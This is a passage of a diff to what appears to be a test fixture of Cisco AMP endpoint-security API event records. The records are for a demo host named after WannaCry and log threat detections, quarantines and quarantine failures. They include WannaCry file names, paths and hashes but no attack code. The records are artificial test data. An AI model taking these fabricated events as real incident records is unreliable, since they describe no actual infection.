Failure","event_type_id":2164260880,"detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":596000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":34000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":894000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":4688,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":286000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} \ No newline at end of file +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":572000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":120000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":1008,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":73000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":26000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 